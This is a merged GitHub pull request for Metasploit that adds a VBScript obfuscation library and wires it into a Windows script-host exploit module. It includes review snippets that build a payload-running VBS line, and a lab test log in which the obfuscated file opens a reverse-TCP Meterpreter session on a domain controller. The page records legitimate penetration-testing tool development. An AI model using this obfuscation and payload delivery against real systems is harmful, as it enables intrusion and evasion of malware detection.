Skip to content

Comments

Msf::Exploit::VBSObfuscate: Add VBS obfuscation library#20568

Merged
jheysel-r7 merged 2 commits intorapid7:masterfrom
bcoles:vbsobfuscate
Oct 3, 2025
Merged

Msf::Exploit::VBSObfuscate: Add VBS obfuscation library#20568
jheysel-r7 merged 2 commits intorapid7:masterfrom
bcoles:vbsobfuscate

Conversation

@bcoles
Copy link
Contributor

@bcoles bcoles commented Sep 25, 2025

Wires up the Msf::Exploit::VBSObfuscate mixin interface for the new Rex::Exploitation::VBSObfuscate library (rapid7/rex-exploitation#47) and updates the exploit/windows/fileformat/windows_script_host_vbscript module to use it.

adfoster-r7
adfoster-r7 reviewed Sep 25, 2025
View reviewed changes
lib/msf/core/exploit/vbsobfuscate.rb Outdated
super
register_advanced_options([
OptInt.new('VbsObfuscate', [false, 'Number of times to obfuscate VBS', 1]),
], Exploit::VBSObfuscate)
Copy link
Contributor

@adfoster-r7 adfoster-r7 Sep 25, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Not a blocker; I don't think this is required anymore 🤔

Suggested change
], Exploit::VBSObfuscate)
])

adfoster-r7
adfoster-r7 reviewed Sep 25, 2025
View reviewed changes
lib/msf/core/exploit/vbsobfuscate.rb Outdated
Comment on lines 30 to 33
obfuscate_opts = {}
obfuscate_opts.merge!(iterations: iterations)
obfuscate_opts.merge!(normalize_whitespace: normalize_whitespace)
obfuscate_opts.merge!(dynamic_execution: dynamic_execution)
Copy link
Contributor

@adfoster-r7 adfoster-r7 Sep 25, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Not a blocker:

Suggested change
obfuscate_opts = {}
obfuscate_opts.merge!(iterations: iterations)
obfuscate_opts.merge!(normalize_whitespace: normalize_whitespace)
obfuscate_opts.merge!(dynamic_execution: dynamic_execution)
obfuscate_opts = {
iterations: iterations,
normalize_whitespace: normalize_whitespace,
dynamic_execution: dynamic_execution
}

adfoster-r7
adfoster-r7 reviewed Sep 25, 2025
View reviewed changes
modules/exploits/windows/fileformat/windows_script_host_vbscript.rb Outdated
vbs_payload = "CreateObject(\"#{shell_obj}\").Run(\"#{cmd}\")"
if obfuscate
vbs << obfuscate_vbscript(vbs_payload)
vbs << Rex::Exploitation::VBSObfuscate.new(vbs_payload).obfuscate!.to_s
Copy link
Contributor

@adfoster-r7 adfoster-r7 Sep 25, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Was this meant to use the mixin? 🤔

Suggested change
vbs << Rex::Exploitation::VBSObfuscate.new(vbs_payload).obfuscate!.to_s
vbs << vbs_obfuscate(vbs_payload)

@bcoles
Copy link
Contributor Author

bcoles commented Sep 25, 2025
edited
Loading

Pushed again to update the default behavior in line with the library default behavior (normalize white space and use dynamic execution by default).

@jheysel-r7 jheysel-r7 self-assigned this Oct 3, 2025
jheysel-r7
jheysel-r7 approved these changes Oct 3, 2025
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @bcoles 🙏

Testing

msf exploit(windows/fileformat/windows_script_host_vbscript) > set OBFUSCATE true
OBFUSCATE => true
msf exploit(windows/fileformat/windows_script_host_vbscript) > set VbsObfuscate 2
VbsObfuscate => 2
msf exploit(windows/fileformat/windows_script_host_vbscript) > set FETCH_WRITABLE_DIR C:\\Windows\\Temp
FETCH_WRITABLE_DIR => C:\Windows\Temp
msf exploit(windows/fileformat/windows_script_host_vbscript) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf exploit(windows/fileformat/windows_script_host_vbscript) > set WfsDelay 1000
WfsDelay => 1000
msf exploit(windows/fileformat/windows_script_host_vbscript) > run
[*] Started reverse TCP handler on 172.16.199.130:4444
[+] msf.vbs stored at /home/msfuser/.msf4/local/msf.vbs
[*] Sending stage (203846 bytes) to 172.16.199.200
[*] Meterpreter session 1 opened (172.16.199.130:4444 -> 172.16.199.200:51285) at 2025-10-03 12:07:04 -0700

meterpreter > getuid
Server username: KERBEROS\Administrator
meterpreter > sysinfo
Computer        : DC2
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : KERBEROS
Logged On Users : 5
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down session: 1

[*] 172.16.199.200 - Meterpreter session 1 closed.  Reason: User exit

Setting VbsObfuscate to 6 output an 800MB payload 👍

➜  local ls -ltr
total 813060
-rw-rw-r-- 1 msfuser msfuser 832565507 Oct  3 12:47 msf.vbs

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban Oct 3, 2025
@jheysel-r7 jheysel-r7 merged commit 5252e92 into rapid7:master Oct 3, 2025
48 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Oct 3, 2025
@jheysel-r7
Copy link
Contributor

jheysel-r7 commented Oct 3, 2025

Release Notes

This adds a new library for VBS payload obfuscation and updates the windows/fileformat/windows_script_host_vbscript module to make use of the new library.

@bcoles bcoles deleted the vbsobfuscate branch October 4, 2025 03:33
@dledda-r7 dledda-r7 added the rn-enhancement release notes enhancement label Oct 9, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 approved these changes

Assignees

@jheysel-r7 jheysel-r7

Labels

enhancement library rn-enhancement release notes enhancement

Projects

Metasploit Kanban
Archived in project

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@bcoles @jheysel-r7 @adfoster-r7 @dledda-r7